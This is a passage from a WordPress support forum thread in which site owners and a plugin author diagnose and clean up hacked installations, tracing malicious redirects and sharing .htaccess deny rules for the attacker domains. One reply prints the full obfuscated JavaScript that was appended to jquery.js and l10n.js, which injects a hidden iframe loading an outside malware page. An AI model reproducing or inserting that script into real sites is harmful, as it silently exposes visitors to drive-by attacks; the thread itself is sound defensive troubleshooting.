Support » Plugins and Hacks » WordPress HTTPS (SSL) » [Resolved] Two Strange Errors

[Resolved] Two Strange Errors

  • Hello,

    I am using Version 1.9.1 of your plugin.

    Things have worked great for a long time but recently things have gone haywire.

    I have two problems that I cannot seem to figure out.

    1. I am now forced to log into my WordPress admin via https. If log-in via http, I am redirected to the log in each and every time.

    2. For some reason, I started to get browser warnings that my https is not loading secure along with a broken https in the browers URL line. The culprit turned out to be http://superpuperdomain.com/count.php which apparently is WordPress core code (index.php). So I enabled, as suggested in this forum, External HTTPS Elements and Bypass External Check. That fixed the security errors. However, now in Internet Explorer 9, I get this warning, “Internet Explorer block this website from displaying content with security certificate errors.” The interesting thing is this appears on non-https pages – even before I reach a https page. This is a new error, and I am confident my security certificate is fine.

    Any suggestions?


Viewing 15 replies - 16 through 30 (of 34 total)
  • I filed a complaint at superpuperdomain.com’s registrar with some additional information and a virus report. I am very pleased to let y’all know the domain has been suspended 🙂

    I’m getting crap from superpuperdomain2.com

    Did you add the .htaccess I suggested?

    order allow,deny
    deny from 91.220
    deny from 91.196
    deny from superpuperdomain.com
    deny from superpuperdomain2.com
    allow from all

    I also suggest you ban the IP and IP range from those domains. You can use the WP-Ban plugin for this, or any other plugin that works the same.

    Hello all, like many of you, one of my site was affected by this crap…

    But I’ve found something else after cleaning it, a little iframe, in a javascript (Obfuscated), in my case it was in \wp-includes\js\l10n.js and \wp-includes\js\jquery\jquery.js …. `

    var _0x4de4=["\x64\x20\x35\x28\x29\x7B\x62\x20\x30\x3D\x32\x2E\x63\x28\x22\x33\x22\x29\x3B\x32\x2E\x39\x2E\x36\x28\x30\x29\x3B\x30\x2E\x37\x3D\x27\x33\x27\x3B\x30\x2E\x31\x2E\x61\x3D\x27\x34\x27\x3B\x30\x2E\x31\x2E\x6B\x3D\x27\x34\x27\x3B\x30\x2E\x69\x3D\x27\x66\x3A\x2F\x2F\x67\x2D\x68\x2E\x6D\x2F\x6A\x2E\x65\x27\x7D\x38\x28\x35\x2C\x6C\x29\x3B","\x7C","\x73\x70\x6C\x69\x74","\x65\x6C\x7C\x73\x74\x79\x6C\x65\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x69\x66\x72\x61\x6D\x65\x7C\x31\x70\x78\x7C\x4D\x61\x6B\x65\x46\x72\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x69\x64\x7C\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74\x7C\x62\x6F\x64\x79\x7C\x77\x69\x64\x74\x68\x7C\x76\x61\x72\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x70\x68\x70\x7C\x68\x74\x74\x70\x7C\x63\x6F\x75\x6E\x74\x65\x72\x7C\x77\x6F\x72\x64\x70\x72\x65\x73\x73\x7C\x73\x72\x63\x7C\x66\x72\x61\x6D\x65\x7C\x68\x65\x69\x67\x68\x74\x7C\x31\x30\x30\x30\x7C\x63\x6F\x6D","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0x2f46x1,_0x2f46x2,_0x2f46x3,_0x2f46x4,_0x2f46x5,_0x2f46x6){_0x2f46x5=function (_0x2f46x3){return _0x2f46x3.toString(36)};if(!_0x4de4[5][_0x4de4[4]](/^/,String)){while(_0x2f46x3--){_0x2f46x6[_0x2f46x3.toString(_0x2f46x2)]=_0x2f46x4[_0x2f46x3]||_0x2f46x3.toString(_0x2f46x2);}_0x2f46x4=[function (_0x2f46x5){return _0x2f46x6[_0x2f46x5]}];_0x2f46x5=function (){return _0x4de4[6]};_0x2f46x3=1;};while(_0x2f46x3--){if(_0x2f46x4[_0x2f46x3]){_0x2f46x1=_0x2f46x1[_0x4de4[4]]( new RegExp(_0x4de4[7]+_0x2f46x5(_0x2f46x3)+_0x4de4[7],_0x4de4[8]),_0x2f46x4[_0x2f46x3]);}}return _0x2f46x1}(_0x4de4[0],23,23,_0x4de4[3][_0x4de4[2]](_0x4de4[1]),0,{}));

    And it’s basically add an iframe going to : http://counter-wordpress.com/frame.php …. It’s obviously engineer to be stealth … As it’s not showing in your html source, and loaded by a wordpress JS, and is probably don’t do much at this moment (Probably in standby) ….

    Anyone else have this ?

    I have the files, but not the piece of code you are giving…..

    Well, i’ve seen 2 other site who got this, after being affected by the PHPRemoteView via timthumb ….

    Dang. Now I see that I have it to…


    It did not occur in my case.

    No guarantees, but you can check the dates of the files in your WordPress installation. Those infected are dated the day of infection.

    I made a post in Portuguese, reporting on my case.

    Falha de segurança no Timthumb

    Plugin Author Mike Ems


    I checked out http://counter-wordpress.com/frame.php and it appears to load some scripts and then redirect to http://global-traff.com/tds/in.cgi?5&user=mexx and then to http://global-traff.com/tds/in.cgi?mexx and then to http://global-traff.com/tds/in.cgi?18 and then to http://global-traff.com/empity.html.

    The frame.php appears to be the same script from superpuperdomain.com and superpuperdomain2.com.

    After viewing the file once, it will always be blank (it probably stores your IP address and doesn’t load anything again afterward). I haven’t been able to pull the page back up to prevent the redirect and see exactly what it’s loading.

    Cool info Mvied, i will check with one of my dynamic ip VPN …..

    Thanks, Elmo_is_evil. Your earlier comment helped me track down the same thing on every WP installation on my server. 🙂

    If you find this in any other files, please note it and I’ll do the same.


    The same code was appended to any script in any directory that started with ‘jquery’. So, even old versions of jQuery in old plugins, like ‘jquery-1.3.2.min.js’ were affected.

    Okay… Now my other site got hacked too. Not by superpuperdomain.com but touchtrip.ru….

    It seems to be a lot more difficult to resolve 🙁

    Anyone else got probs with downloading plugins through the backend? Like, get redirected to google, or the malware message from google?

    Found it, my .htacces file had a few hidden lines that linked to http:*//distributioncorporate*.ru/kloac/index.php

    Delete your .htaccess file and make a new one.

    These hackers also place phony files in your wordpress installation. Check your uploads directory and theme files for sm3.php and other files you don’t reconize.

Viewing 15 replies - 16 through 30 (of 34 total)
  • The topic ‘[Resolved] Two Strange Errors’ is closed to new replies.